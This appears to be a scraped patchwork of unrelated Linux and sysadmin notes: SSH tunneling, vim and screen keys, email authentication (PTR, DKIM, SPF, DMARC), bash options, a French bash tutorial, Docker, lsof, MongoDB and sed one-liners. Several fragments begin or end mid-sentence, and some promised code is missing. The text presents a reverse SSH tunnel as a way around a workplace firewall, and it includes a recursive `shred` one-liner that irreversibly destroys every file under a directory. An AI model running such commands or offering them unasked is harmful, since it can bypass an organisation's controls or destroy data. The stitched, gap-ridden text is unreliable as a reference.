As in the earlier case we will initiate the tunnel from ‘work’ computer behind the firewall. This is possible since only incoming traffic is blocking and outgoing traffic is allowed. However instead of the earlier case the client will now be at the ‘home’ computer. Instead of -L option we now define -R which specifies
a reverse tunnel need to be created.
ssh -R 9001:intra-site.com:80 home (Executed from 'work')
Once executed the SSH client at ‘work’ will connect to SSH server running at home creating a SSH channel. Then the server will bind port 9001 on ‘home’ machine to listen for incoming requests which would subsequently be routed through the created SSH channel between ‘home’ and ‘work’. Now it’s possible to browse the internal site
by visiting http://localhost:9001 in ‘home’ web browser. The ‘work’ will then create a connection to intra-site and relay back the response to ‘home’ via the created SSH channel.
As nice all of these would be still you need to create another tunnel if you need to connect to another site in both cases. Wouldn’t it be nice if it is possible to proxy traffic to any site using the SSH channel created? That’s what dynamic port forwarding is all about.
Dynamic Port Forwarding
Dynamic port forwarding allows to configure one local port for tunnelling data to all remote destinations. However to utilize this the client application connecting to local port should send their traffic using the SOCKS protocol. At the client side of the tunnel a SOCKS proxy would be created and the application (eg. browser) uses the SOCKS protocol to specify where the traffic should be sent when it leaves the other end of the ssh tunnel.
ssh -D 9001 home (Executed from 'work')
Here SSH will create a SOCKS proxy listening in for connections at local port 9001 and upon receiving a request would route the traffic via SSH channel created between ‘work’ and ‘home’. For this it is required to configure the browser to point to the SOCKS proxy at port 9001 at localhost.
This is a linux command line reference for common operations.
Examples marked with • are valid/safe to paste without modification into a terminal, so you may want to keep a terminal window open while reading this so you can cut & paste.
Command
Description
•
apropos whatis
Show commands pertinent to string. See also threadsafe
so you can start typing. Alternatively one can use i or a.
Esc
leave insert mode
so you can issue commands. Note in VIM the cursor keys & {Home, End, Page{up,down}} and Delete and Backspace work as expected in any mode, so you don't need to go back to command mode nearly as much as the origonal vi. Note even Ctrl+{left,right} jumps words like most other editors. Note also Ctrl+[ and Ctrl+c are equivalent to Esc and may be easier to type. Also Ctrl+o in insert mode will switch to normal mode for one command only and automatically switch back.
:command
runs named command
:help word
shows help on word
Typing Ctrl+d after word shows all entries containing word
:echo &word
shows value of word
windows
:e
set buffer for current window
you can optionally specify a new file or existing buffer number (#3 for e.g.). Note if you specify a directory a file browser is started. E.g. :e . will start the browser in the current directory (which can be changed with the :cd command).
:sp
new window above
ditto
:vs
new window to left
ditto
:q
close current window
:qa
close all windows
add trailing ! to force
Ctrl+w {left,right,up,down}
move to window
Ctrl+w Ctrl+w
toggle window focus
Ctrl+w =
autosize windows
to new terminal size for e.g.
:ba
new window for all buffers
":vert ba" tiles windows vertically
buffers
:ls
list buffers
gf
open file under cursor
:bd
delete buffer
and any associated windows
:w
save file
Note :up[date] only writes file if changes made, but it's more awkward to type
:sav filename
save file as filename
Note :w filename doesn't switch to new file. Subsequent edits/saves happen to existing file
undo/redo
u
undo
Ctrl+r
redo
.
repeat
navigation
gg
Goto start of file
G
Goto end of file
:54
Goto line 54
80|
Goto column 80
Ctrl+g
Show file info
including your position in the file
ga
Show character info
g8 shows UTF8 encoding
Ctrl+e
scroll up
Ctrl+x needed first for insert mode
Ctrl+y
scroll down
Ctrl+x needed first for insert mode
zt
scroll current line to top of window
w
Goto next word
Note Ctrl+{right} in newer vims (which work also in insert mode)
b
Goto previous word
Note Ctrl+{left} in newer vims
[{
Goto previous { of current scope
%
Goto matching #if #else,{},(),[],/* */
must be one on line
zi
toggle folds on/off
bookmarks
m {a-z}
mark position as {a-z}
E.g. m a
' {a-z}
move to position {a-z}
E.g. ' a
' '
move to previous position
'0
open previous file
handy after starting vim
selection/whitespace
v
select visually
use cursor keys, home, end etc.
Shift+v
line select
CTRL+v = column select
Delete
cut selection
"_x
delete selection
without updating the clipboard or yank buffer. I remap x to this in my .vimrc
y
copy selection
p
paste (after cursor)
P is paste before cursor
"Ay
append selected lines to register a
use lowercase a to initialise register
"ap
paste contents of a
gq
reformat selection
justifies text and is useful with :set textwidth=70 (80 is default)
search for regexp 1 and replace with 2 in (visual) selection
programming
K
lookup word under cursor in man pages
2K means lookup in section 2
:make
run make in current directory
Ctrl+]
jump to tag
Ctrl+t to jump back levels. I map these to Alt+⇦⇨ in my .vimrc
vim -t name
Start editing where name is defined
Ctrl+{n,p}
scroll forward,back through autocompletions for word before cursor
uses words in current file (and included files) by default. You can change to a dictionary for e.g: set complete=k/usr/share/dicts/words Note only works in insert mode
Ctrl+x Ctrl+o
scroll through language specific completions for text before cursor
"Intellisense" for vim (7 & later). :help compl-omni for more info. Useful for python, css, javascript, ctags, ... Note only works in insert mode
screen is a much under utilised program, which provides the following functionality:
Remote terminal session management (detaching or sharing terminal sessions)
unlimited windows (unlike the hardcoded number of Linux virtual consoles)
scrollback buffer (not limited to video memory like Linux virtual consoles)
copy/paste between windows
notification of either activity or inactivity in a window
split terminal (horizontally and vertically) into multiple regions
locking other users out of terminal
See also the tmux alternative
See also the byobu screen config manager.
See also the reptyr as another way to reattach programs to a terminal.
Note for nested screen sessions, use "Ctrl+a a" to send commands to the inner screen,
and the standard "Ctrl+a" to send commands to the outer screen.
Key
Action
Notes
Ctrl+a c
new window
Ctrl+a n
next window
I bind F12 to this
Ctrl+a p
previous window
I bind F11 to this
Ctrl+a "
select window from list
I have window list in the status line
Ctrl+a Ctrl+a
previous window viewed
Ctrl+a S
split terminal horizontally into regions
Ctrl+a c to create new window there
Ctrl+a |
split terminal vertically into regions
Requires screen >= 4.1
Ctrl+a :resize
resize region
Ctrl+a :fit
fit screen size to new terminal size
Ctrl+a F is the same. Do after resizing xterm
Ctrl+a :remove
remove region
Ctrl+a X is the same
Ctrl+a tab
Move to next region
Ctrl+a d
detach screen from terminal
Start screen with -r option to reattach
Ctrl+a A
set window title
Ctrl+a x
lock session
Enter user password to unlock
Ctrl+a [
enter scrollback/copy mode
Enter to start and end copy region. Ctrl+a ] to leave this mode
Email is the cockroach of communication mediums: you just can't kill it. Email is the one method of online contact that almost everyone -- at least for that subset of "everyone" which includes people who can bear to touch a computer at all -- is guaranteed to have, and use.
So, reluctantly, we come to the issue of sending email through code. It's easy! Let's send some email through oh, I don't know, let's say ... Ruby, courtesy of some sample code I found while browsing the Ruby tag on Stack Overflow.
require 'net/smtp'
def send_email(to, subject = "", body = "")
from = "my@email.com"
body= "From: #{from}\r\nTo: #{to}\r\nSubject: #{subject}\r\n\r\n#{body}\r\n"
Net::SMTP.start('192.168.10.213', 25, '192.168.0.218') do |smtp|
smtp.send_message body, from, to
end
end
send_email "my@email.com", "test", "blah blah blah"
There's a bug in this code, though. Do you see it?
Just because you send an email doesn't mean it will arrive. Not by a long shot. Bear in mind this is email we're talking about. It was never designed to survive a bitter onslaught of criminals and spam, not to mention the explosive, exponential growth it has seen over the last twenty years. Email is a well that has been truly and thoroughly poisoned -- the digital equivalent of a superfund cleanup site. The ecosystem around email is a dank miasma of half-implemented, incompletely supported anti-spam hacks and workarounds.
Which means the odds of that random email your code just sent getting to its specific destination is .. spotty. At best.
If you want email your code sends to actually arrive in someone's AOL mailbox, to the dulcet tones of "You've Got Mail!", there are a few things you must do first. And most of them are only peripherally related to writing code.
1. Make sure the computer sending the email has a Reverse PTR record
What's a reverse PTR record? It's something your ISP has to configure for you -- a way of verifying that the email you send from a particular IP address actually belongs to the domain it is purportedly from.
Not every IP address has a corresponding PTR record. In fact, if you took a random sampling of addresses your firewall blocked because they were up to no good, you'd probably find most have no PTR record - a dig -x gets you no information. That's also apt to be true for mail spammers, or their PTR doesn't match up: if you do a dig -x on their IP you get a result, but if you look up that result you might not get the same IP you started with.
That's why PTR records have become important. Originally, PTR records were just intended as a convenience, and perhaps as a way to be neat and complete. There still are no requirements that you have a PTR record or that it be accurate, but because of the abuse of the internet by spammers, certain conventions have grown up. For example, you may not be able to send email to some sites if you don't have a valid PTR record, or if your pointer is "generic".
How do you get a PTR record? You might think that this is done by your domain registrar - after all, they point your domain to an IP address. Or you might think whoever handles your DNS would do this. But the PTR record isn't up to them, it's up to the ISP that "owns" the IP block it came from. They are the ones who need to create the PTR record.
A reverse PTR record is critical. How critical? Don't even bother reading any further until you've verified that your ISP has correctly configured the reverse PTR record for the server that will be sending email. It is absolutely the most common check done by mail servers these days. Fail the reverse PTR check, and I guarantee that a huge percentage of the emails you send will end up in the great bit bucket in the sky -- and not in the email inboxes you intended.
2. Configure DomainKeys Identified Mail in your DNS and code
What's DomainKeys Identified Mail? With DKIM, you "sign" every email you send with your private key, a key only you could possibly know. And this can be verified by attempting to decrypt the email using the public key stored in your public DNS records. It's really quite clever!
The first thing you need to do is generate some public-private key pairs (one for every domain you want to send email from) via OpenSSL. I used a win32 version I found. Issue these commands to produce the keys in the below files:
These public and private keys are just big ol' Base64 encoded strings, so plop them in your code as configuration string resources that you can retrieve later.
Next, add some DNS records. You'll need two new TXT records.
_domainkey.example.com
"o=~; r=contact@example.com"
selector._domainkey.example.com
"k=rsa; p={public-key-base64-string-here}"
The first TXT DNS record is the global DomainKeys policy and contact email.
The second TXT DNS record is the public base64 key you generated earlier, as one giant unbroken string. Note that the "selector" part of this record can be anything you want; it's basically just a disambiguating string.
Almost done. One last thing -- we need to sign our emails before sending them. In any rational world this would be handled by an email library of some kind. We use Mailbee.NET which makes this fairly painless:
To be honest, SenderID is a bit of a "nice to have" compared to the above two. But if you've gone this far, you might as well go the distance. SenderID, while a little antiquated and kind of.. Microsoft/Hotmail centric.. doesn't take much additional effort.
SenderID isn't complicated. It's another TXT DNS record at the root of, say, example.com, which contains a specially formatted string documenting all the allowed IP addresses that mail can be expected to come from. Here's an example:
That sucked. How do I know all this junk is working?
I agree, it sucked. Email sucks; what did you expect? I used two methods to verify that all the above was working:
Test emails sent to a GMail account.
Use the "show original" menu on the arriving email to see the raw message content as seen by the email server. You want to verify that the headers definitely contain the following:
If you see that, then the Reverse PTR and DKIM signing you set up is working. Google provides excellent diagnostic feedback in their email server headers, so if something isn't working, you can usually discover enough of a hint there to figure out why.
Test emails sent to the Port25 email verifier
Port25 offers a really nifty public service -- you can send email to check-auth@verifier.port25.com and it will reply to the from: address with an extensive diagnostic! Here's an example summary result from a test email I just sent to it:
You want to pass SPF, DKIM, and Sender-ID. Don't worry about the DomainKeys failure, as I believe it is spurious -- DKIM is the "newer" version of that same protocol.
If you’re an email marketer, you’ve probably heard acronyms like “SPF,” “DKIM,” and “DMARC” being tossed around with little explanation. People might assume you automatically understand these terms, but the truth is that many marketers’ grasp of these concepts is vague, at best.
The good news is that SPF, DKIM, and DMARC can work together for you like a triple rainbow of email authentication, and that’s why we want you to have a thorough understanding of them. The explanations are technical, but these are three fundamental concepts to understand about email authentication.
We’ll provide you with a brief and insightful look at each of these protocols, then you’ll be able to start tossing these acronyms around like the pros. First things first…
What is email authentication, and why is it so important?
Email authentication helps to improve the delivery and credibility of your marketing emails by implementing protocols that verify your domain as the sender of your messages.
Using authentication won’t guarantee that your mail reaches the inbox but it preserves your brand reputation while making sure you have the best possible chance of having your messages reach their intended destination.
Read on to find out how to ensure you’re achieving the gold standard of email authentication.
SPF, DKIM, and DMARC: 3 Technical, but Essential, Explanations
SPF: Sender Policy Framework
SPF, Sender Policy Framework, is a way for recipients to confirm the identity of the sender of an incoming email.
By creating an SPF record, you can designate which mail servers are authorized to send mail on your behalf. This is especially useful if you have a hosted email solution (Office365, Google Apps, etc.) or if you use an ESP like Higher Logic.
Here’s a brief synopsis of the process:
The sender adds a record to the DNS settings.
The record is for the domain used in their FROM: address (e.g. if I send from contact@sysa.tech, add the record to sysa.tech). This record includes all IP addresses (mail servers) that are authorized to send mail on behalf of this domain. A typical SPF record will look something like this: v=spf1 ip4:64.34.187.182 ip4:66.70.82.40 ip4:64.27.72.0/24 include:magnetmail.net ~all
The receiving server checks the DNS records.
When the mail is sent, the receiving server checks the DNS records for the domain in the FROM: field. If the IP address is listed in that record (as seen above), the message passes SPF.
If SPF exists, but the IP address isn't in the record, it's a hard fail.
If the SPF record exists, but the IP address of the sending mail server isn’t in the record, it’s considered a “hard-fail.” This can often cause mail to be rejected or routed to the spam folder.
If no SPF record exists, it's a soft fail.
If no SPF record exists at all, this is considered a “soft-fail.” These are most likely to cause messages to be routed to spam but can lead to a message being rejected as well.
DKIM: DomainKeys Identified Mail
DKIM, short for DomainKeys Identified Mail, also allows for the identification of “spoofed” emails but using a slightly different process. Instead of a single DNS record that keys off the FROM: address, DKIM employs two encryption keys: one public and one private.
The private key is housed in a secure location that can only be accessed by the owner of the domain. This private key is used to create an encrypted signature that is added to every message sent from that domain. Using the signature, the receiver of the message can check against the public DKIM key, which is stored in a public-facing DNS record. If the records “match,” the mail could only have been sent by the person with access to the private key, aka the domain owner.
While SPF and DKIM can be used as stand-alone methods, DMARC must rely on either SPF or DKIM to provide the authentication.
DMARC (Domain-based Message Authentication, Reporting, & Conformance) builds on those technologies by providing directions to the receiver on what to do if a message from your domain is not properly authenticated.
Like SPF and DKIM, DMARC also requires a specific DNS record to be entered for the domain you wish to use in your FROM: address. This record can include several values, but only two are required:
(v) tells the receiving server to check DMARC
(p) gives instructions on what to do if authentication fails.
The values for p can include:
p=none, which tells the receiving server to take no specific action if authentication fails.
p=quarantine, which tells the receiving server to treat unauthenticated mail suspiciously. This could mean routing the mail to spam/junk, or adding a flag indicating the mail is not trusted.
p=reject, which tells the receiving server to reject any mail that does not pass SPF and/or DKIM authentication.
In addition to the required tags advising how to handle unauthenticated mail, DMARC also provides a reporting component that can be very useful for most organizations. By enabling the reporting features of DMARC, your organization can receive reports indicating all mail that is being sent with your domain in the FROM: address. This can help identify spoofed or falsified mail patterns as well as tracking down other business divisions or partners that may be legitimately sending mail on your behalf without authentication.
allexport off
braceexpand on
emacs on
errexit off
errtrace off
functrace off
hashall on
histexpand on
history on
ignoreeof off
interactive-comments on
keyword off
monitor on
noclobber off
noexec off
noglob off
nolog off
notify off
nounset off
onecmd off
physical off
pipefail off
posix off
privileged off
verbose off
vi off
xtrace off
See set command for detailed explanation of each variable.
How do I set and unset shell variable options?
To set shell variable option use the following syntax:
set -o variableName
To unset shell variable option use the following syntax:
set +o variableName
Examples
Disable <CTRL-d> which is used to logout of a login shell (local or remote login session over ssh).
set -o ignoreeof
Now, try pressing [CTRL-d]
Sample outputs:
Use "exit" to leave the shell.
Turn it off, enter:
set +o ignoreeof
shopt command
You can turn on or off the values of variables controlling optional behavior using the shopt command. To view a list of some of the currently configured option via shopt, enter:
shopt shopt -p
Sample outputs:
cdable_vars off
cdspell off
checkhash off
checkwinsize on
cmdhist on
compat31 off
dotglob off
execfail off
expand_aliases on
extdebug off
extglob off
extquote on
failglob off
force_fignore on
gnu_errfmt off
histappend off
histreedit off
histverify off
hostcomplete on
huponexit off
interactive_comments on
lithist off
login_shell off
mailwarn off
no_empty_cmd_completion off
nocaseglob off
nocasematch off
nullglob off
progcomp on
promptvars on
restricted_shell off
shift_verbose off
sourcepath on
xpg_echo off
How do I enable (set) and disable (unset) each option?
To enable (set) each option, enter:
shopt -s optionName
To disable (unset) each option, enter:
shopt -u optionName
Examples
If cdspell option set, minor errors in the spelling of a directory name in a cd command will be corrected. The errors checked for are transposed characters, a missing character, and one character too many. If a correction is found, the corrected file name is printed, and the command proceeds. For example, type the command (note /etc directory spelling):
cd /etcc
Sample outputs:
bash: cd: /etcc: No such file or directory
Now, turn on cdspell option and try again the same cd command, enter:
shopt -s cdspell cd /etcc
Sample outputs:
/etc
[vivek@vivek-desktop /etc]$
Customizing Bash environment with shopt and set
Edit your ~/.bashrc, enter:
vi ~/.bashrc
Add the following commands:
# Correct dir spellings shopt -q -s cdspell
# Make sure display get updated when terminal window get resized shopt -q -s checkwinsize
# Turn on the extended pattern matching features shopt -q -s extglob
# Append rather than overwrite history on exit shopt -s histappend
# Make multi-line commandsline in history shopt -q -s cmdhist
# Get immediate notification of background job termination set -o notify
# Disable [CTRL-D] which is used to exit the shell set -o ignoreeof
Le 1er paramètre est : 1 Le 3ème paramètre est : 3 Le 10ème paramètre est : 10 Le 15ème paramètre est : 15
ou encore :
./affiche_param.sh un 2 trois 4 5 6 7 8 9 dix 11 12 13 14 quinze 16 17 Le 1er paramètre est : un Le 3ème paramètre est : trois Le 10ème paramètre est : dix Le 15ème paramètre est : quinze
Si certains paramètres contiennent des caractères spéciaux ou des espaces, il
faut alors les "quoter" :
./affiche_param.sh un 2 "le 3ème" 4 5 6 7 8 9 dix 11 12 13 14 "le 15ème" 16 17 Le 1er paramètre est : un Le 3ème paramètre est : le 3ème Le 10ème paramètre est : dix Le 15ème paramètre est : le 15ème
Les paramètres spéciaux
Ce sont en fait là aussi des variables réservées qui permettent pour certaines d'effectuer des traitements sur les paramètres eux-même.
Ces paramètres sont les suivants :
$0
Contient le nom du script tel qu'il a été invoqué
$*
L'ensembles des paramètres sous la forme d'un seul argument
$@
L'ensemble des arguments, un argument par paramètre
$#
Le nombre de paramètres passés au script
$?
Le code retour de la dernière commande
$$
Le PID su shell qui exécute le script
$!
Le PID du dernier processus lancé en arrière-plan
Exemple 2
Voici un autre petit script mettant en oeuvre l'ensemble des paramètres spéciaux vus ci-dessus.
#!/bin/bash
# affiche_param_2.sh
# Affichage du nom su script
echo "Le nom de mon script est : $0"
# Affichage du nombre de paramètres
echo "Vous avez passé $# paramètres"
# Liste des paramètres (un seul argument)
for param in "$*"
do
echo "Voici la liste des paramètres (un seul argument) : $param"
done
# Liste des paramètres (un paramètre par argument)
echo "Voici la liste des paramètres (un paramètre par argument) :"
for param in "$@"
do
echo -e "\tParamètre : $param"
done
# Affichage du processus
echo "Le PID du shell qui exécute le script est : $$"
# Exécution d'une commande qui s'exécute en arrière-plan
sleep 100 &
# Affichage du processus lancé en arrière-plan
echo "Le PID de la dernière commande exécutée en arrière-plan est : $!"
# Affichage du code retour de la dernière commande "echo"
echo "Le code retour de la commande précédente est : $?"
# Génération d'une erreur
echo "Génération d'une erreur..."
# Affichage de la mauvaise commande
echo "ls /etc/password 2>/dev/null"
ls /etc/password 2>/dev/null
# Affichage du code retour de la dernière commande
echo "Le code retour de la commande précédente est : $?"
exit
Ce qui donne avec l'invocation suivante :
./affiche_param_2.sh 1 2 3 quatre 5 six
Le nom de mon script est : ./affiche_param_2.sh Vous avez passé 6 paramètres Voici la liste des paramètres (un seul argument) : 1 2 3 quatre 5 six Voici la liste des paramètres (un paramètre par argument) : Paramètre : 1 Paramètre : 2 Paramètre : 3 Paramètre : quatre Paramètre : 5 Paramètre : six Le PID du shell qui exécute le script est : 6165 Le PID de la dernière commande exécutée en arrière-plan est : 6166 Le code retour de la commande précédente est : 0 Génération d'une erreur... ls /etc/password 2>/dev/null Le code retour de la commande précédente est : 1
Initialiser des paramètres
- La commande "set" -
Il est possible d'affecter directement des paramètres au shell grâce à la commande
set
Une simple commande tel que :
set param1 param2 param3
initialisera automatiquement les paramètres positionnels
$1
,
$2
,
$3
avec les valeurs
param1
,
param2
,
param3
, effaçant de ce fait les anciennes valeurs si toutefois elles existaient. Les paramètres spéciaux
$#
,
$*
et
$@
sont automatiquement mis à jours en conséquence.
Exemples
$ set param1 param2 param3 $ echo "Nombre de paramètres : $#" Nombre de paramètres : 3 $ echo "Le second paramètre est : $2" Le second paramètre est : param2 $ echo "Les paramètres sont : $@" Les paramètres sont : param1 param2 param3
$ set pêche pomme $ echo "Nombre de paramètres : $#" Nombre de paramètres : 2 $ echo "Les paramètres sont : $@" Les paramètres sont : pêche pomme
Cette fonctionnalité peut s'avérer utile dans le traitement de fichiers ligne
par ligne afin d'isoler chaque mot (champ), et d'en formater la sortie.
Login : jp Nom : Jean-Philippe ID : 500 Group : 500 Shell : /bin/bash
- La commande "shift" -
La commande interne
shift
permet quant à elle de décaler les paramètres.
La valeur du 1er paramètre (
$1
) est remplacée par la valeur du 2nd paramètre (
$2
), celle du 2nd paramètre (
$2
) par celle du 3ème paramètre (
$3
), etc...
On peut indiquer en argument (
shift [n]
) le nombre de pas (position) dont il faut décaler les paramètres.
Exemple 3
Voilà une mise en oeuvre de l'emploi de la commande interne "shift".
#!/bin/bash
# decale_param.sh
echo
echo "Nombre de paramètres : $#"
echo "Le 1er paramètre est : $1"
echo "Le 3ème paramètre est : $3"
echo "Le 6ème paramètre est : $6"
echo "Le 10ème paramètre est : ${10}"
echo "============================================="
echo "Décalage d'un pas avec la commande \"shift\""
shift
echo "Nombre de paramètres : $#"
echo "Le 1er paramètre est : $1"
echo "Le 3ème paramètre est : $3"
echo "Le 6ème paramètre est : $6"
echo "Le 10ème paramètre est : ${10}"
echo "============================================="
echo "Décalage de quatre pas avec la commande \"shift 4\""
shift 4
echo "Nombre de paramètres : $#"
echo "Le 1er paramètre est : $1"
echo "Le 3ème paramètre est : $3"
echo "Le 6ème paramètre est : $6"
echo "Le 10ème paramètre est : ${10}"
echo
Et son résultat :
./decale_param.sh 1 2 3 4 5 6 7 8 9 10
Nombre de paramètres : 10 Le 1er paramètre est : 1 Le 3ème paramètre est : 3 Le 6ème paramètre est : 6 Le 10ème paramètre est : 10 ============================================= Décalage d'un pas avec la commande "shift" Nombre de paramètres : 9 Le 1er paramètre est : 2 Le 3ème paramètre est : 4 Le 6ème paramètre est : 7 Le 10ème paramètre est : ============================================= Décalage de quatre pas avec la commande "shift 4" Nombre de paramètres : 5 Le 1er paramètre est : 6 Le 3ème paramètre est : 8 Le 6ème paramètre est : Le 10ème paramètre est :
Ce document intitulé « Bash - Les paramètres » issu de CommentCaMarche (https://www.commentcamarche.net/) est mis à disposition sous les termes de la licence Creative Commons.
Vous pouvez copier, modifier des copies de cette page, dans les conditions fixées par la licence, tant que cette note apparaît clairement.
Quick and dirty OpenSSH configlet here. If you have a set of hosts or devices that require you to first jump through a bastion host, the following will allow you to run a single ssh command:
Host * ProxyCommand ssh -A <bastion_host> nc %h %p
Change the Host * line to best match the hostnames that require a bastion host.
Start with connecting : telnet switch ssh switch
To have admin privileges : ena
Look at the config : show run
See the log : show log
Sneak a peek at the power supply, fan and temps : show environment
Show the status of an interface : show int ... status
Go to configuration mode : conf t int ...
Copy the configuration ( running to persistent mem ) : wr
When you're a developer your boss wants you to do things quickly even it's buggy.
When you're a sysadmin your boss wants you to do things right even it's slow.
Sometimes things crash when they’re running inside a Docker container though, and then all of a sudden it can get much more difficult to work out why, or what the hell to do next.
If you’re stuck in that situation, here’s my goto debugging commands to help you get a bit more information on what’s up:
docker logs <container_id>
Hopefully you’ve already tried this, but if not, start here. This’ll give you the full STDOUT and STDERR from the command that was run initially in your container.
docker stats <container_id> If you just need to keep an eye on the metrics of your container to work out what’s gone wrong, docker stats can help: it’ll give you a live stream of resource usage, so you can see just how much memory you’ve leaked so far.
docker cp <container_id>:/path/to/useful/file /local-path Often just getting hold of more log files is enough to sort you out. If you already know what you want, docker cp has your back: copy any file from any container back out onto your local machine, so you can examine it in depth (especially useful analysing heap dumps).
docker exec -it <container_id> /bin/bash Next up, if you can run the container (if it’s crashed, you can restart it with docker start <container_id>), shell in directly and start digging around for further details by hand.
docker commit <container_id> my-broken-container && docker run -it my-broken-container /bin/bash Can’t start your container at all? If you’ve got a initial command or entrypoint that immediately crashes, Docker will immediately shut it back down for you. This can make your container unstartable, so you can’t shell in any more, which really gets in the way. Fortunately, there’s a workaround: save the current state of the shut-down container as a new image, and start that with a different command to avoid your existing failures. Have a failing entrypoint instead? There’s an entrypoint override command-line flag too.
lsof stands for List Open Files. It is easy to remember lsof command if you think of it as “ls + of”, where ls stands for list, and of stands for open files.
It is a command line utility which is used to list the information about the files that are opened by various processes. In unix, everything is a file, ( pipes, sockets, directories, devices, etc.). So by using lsof, you can get the information about any opened files.
1. Introduction to lsof
Simply typing lsof will provide a list of all open files belonging to all active processes.
By default One file per line is displayed. Most of the columns are self explanatory. We will explain the details about couple of cryptic columns (FD and TYPE).
FD – Represents the file descriptor. Some of the values of FDs are,
cwd – Current Working Directory
txt – Text file
mem – Memory mapped file
mmap – Memory mapped device
NUMBER – Represent the actual file descriptor. The character after the number i.e ‘1u’, represents the mode in which the file is opened. r for read, w for write, u for read and write.
TYPE – Specifies the type of the file. Some of the values of TYPEs are,
REG – Regular File
DIR – Directory
FIFO – First In First Out
CHR – Character special file
For a complete list of FD & TYPE, refer man lsof.
2. List processes which opened a specific file
You can list only the processes which opened a specific file, by providing the filename as arguments.
# lsof /var/log/syslog
COMMAND PID USER FD TYPE DEVICE SIZE/OFF NODE NAME
rsyslogd 488 syslog 1w REG 8,1 1151 268940 /var/log/syslog
3. List opened files under a directory
You can list the processes which opened files under a specified directory using ‘+D’ option. +D will recurse the sub directories also. If you don’t want lsof to recurse, then use ‘+d’ option.
4. List opened files based on process names starting with
You can list the files opened by process names starting with a string, using ‘-c’ option. -c followed by the process name will list the files opened by the process starting with that processes name. You can give multiple -c switch on a single command line.
Sometime when we try to umount a directory, the system will say “Device or Resource Busy” error. So we need to find out what are all the processes using the mount point and kill those processes to umount the directory. By using lsof we can find those processes.
# lsof /home
The following will also work.
# lsof +D /home/
6. List files opened by a specific user
In order to find the list of files opened by a specific users, use ‘-u’ option.
# lsof -u lakshmanan
COMMAND PID USER FD TYPE DEVICE SIZE/OFF NODE NAME
update-no 1892 lakshmanan 20r FIFO 0,8 0t0 14536 pipe
update-no 1892 lakshmanan 21w FIFO 0,8 0t0 14536 pipe
bash 1995 lakshmanan cwd DIR 8,1 4096 393218 /home/lakshmanan
Sometimes you may want to list files opened by all users, expect some 1 or 2. In that case you can use the ‘^’ to exclude only the particular user as follows
# lsof -u ^lakshmanan
COMMAND PID USER FD TYPE DEVICE SIZE/OFF NODE NAME
rtkit-dae 1380 rtkit 7u 0000 0,9 0 4360 anon_inode
udisks-da 1584 root cwd DIR 8,1 4096 2 /
The above command listed all the files opened by all users, expect user ‘lakshmanan’.
7. List all open files by a specific process
You can list all the files opened by a specific process using ‘-p’ option. It will be helpful sometimes to get more information about a specific process.
# lsof -p 1753
COMMAND PID USER FD TYPE DEVICE SIZE/OFF NODE NAME
bash 1753 lakshmanan cwd DIR 8,1 4096 393571 /home/lakshmanan/test.txt
bash 1753 lakshmanan rtd DIR 8,1 4096 2 /
bash 1753 lakshmanan 255u CHR 136,0 0t0 3 /dev/pts/0
...
8. Kill all process that belongs to a particular user
When you want to kill all the processes which has files opened by a specific user, you can use ‘-t’ option to list output only the process id of the process, and pass it to kill as follows
# kill -9 `lsof -t -u lakshmanan`
The above command will kill all process belonging to user ‘lakshmanan’, which has files opened.
Similarly you can also use ‘-t’ in many ways. For example, to list process id of a process which opened /var/log/syslog can be done by
The above command uses two list options, ‘-u’ and ‘-c’. So the command will list process belongs to user ‘lakshmanan’ as well as process name starts with ‘init’.
But when you want to list a process belongs to user ‘lakshmanan’ and the process name starts with ‘init’, you can use ‘-a’ option.
# lsof -u lakshmanan -c init -a
The above command will not output anything, because there is no such process named ‘init’ belonging to user ‘lakshmanan’.
10. Execute lsof in repeat mode
lsof also support Repeat mode. It will first list files based on the given parameters, and delay for specified seconds and again list files based on the given parameters. It can be interrupted by a signal.
Repeat mode can be enabled by using ‘-r’ or ‘+r’. If ‘+r’ is used then, the repeat mode will end when no open files are found. ‘-r’ will continue to list,delay,list until a interrupt is given irrespective of files are opened or not.
Each cycle output will be separated by using ‘=======’. You also also specify the time delay as ‘-r’ | ‘+r’.
SELECT IFNULL(B.engine,'Total') "Storage Engine",
CONCAT(LPAD(REPLACE(FORMAT(B.DSize/POWER(1024,pw),3),',',''),17,' '),' ',
SUBSTR(' KMGTP',pw+1,1),'B') "Data Size", CONCAT(LPAD(REPLACE(
FORMAT(B.ISize/POWER(1024,pw),3),',',''),17,' '),' ',
SUBSTR(' KMGTP',pw+1,1),'B') "Index Size", CONCAT(LPAD(REPLACE(
FORMAT(B.TSize/POWER(1024,pw),3),',',''),17,' '),' ',
SUBSTR(' KMGTP',pw+1,1),'B') "Table Size"
FROM (SELECT engine,SUM(data_length) DSize,SUM(index_length) ISize,
SUM(data_length+index_length) TSize FROM information_schema.tables
WHERE table_schema NOT IN ('mysql','information_schema','performance_schema')
AND engine IS NOT NULL GROUP BY engine WITH ROLLUP) B,
(SELECT 3 pw) A ORDER BY TSize;
c – create a archive file.
x – extract a archive file.
v – show the progress of archive file.
f – filename of archive file.
t – viewing content of archive file.
j – filter archive through bzip2.
z – filter archive through gzip.
r – append or update files or directories to existing archive file.
W – Verify a archive file.
wildcards – Specify patterns in unix tar command.
examples :
- extract : tar -xvf file.tar
- create : tar -cvf archive.tar /path/tofile
- with compression : tar -cvjf archive.tar.bz2 /path/tofile
This command find all file from the current directory and subdirectories (-type f) and pipe (via xargs or -exec) it to shred (-n 48 48 iterations -z finish by zero -u remove file -v verbose -f force) find . -type f -print0 | xargs -0 shred -fuzv -n 48 find . -type f -exec shred -fuzv -n 48 {} \;
Status :
db.serverStatus();
db.help()
show dbs
use
db.cloneDatabase()
load() Executes a specified javascript file.
auth :
mongo admin -u root -p
use admin
db.auth(“AdminSTH”,”AdminSTH”)
list users :
show users
db.user.find()
db.user.find().pretty()
db.createUser({"user": "ajitesh", "pwd": "gurukul", "roles": ["readWrite", "dbAdmin"]})
db.user.drop()
show roles :
list collections:
show collections
db.collection.find()
db.printCollectionStats()
db..dataSize() // Size of the collection
db..storageSize() // Total size of document stored in the collection
db..totalSize() // Total size in bytes for both collection data and indexes
db..totalIndexSize() // Total size of all indexes in the collectio
db.collection.drop()
User management commands :
db.createUser()
db.dropUser()
Sometimes when you connect to old machines you will need this
because of rhe error : Unable to negotiate with no matching key exchange method found. Their offer:
-oKexAlgorithms=
-c cipher
Find every file from the current folder and replace string : find ./ -type f -exec sed -i 's/string1/string2/g' {} \;
How to prepend text quickly in one line multiple files : find . -name "*.txt" -exec sed -i '1s;^;written by Harlok\n;' {} \;
Grep every file containing matchstring in somedir then replace string1 by string2 grep -rl matchstring somedir/ | xargs sed -i 's/string1/string2/g'
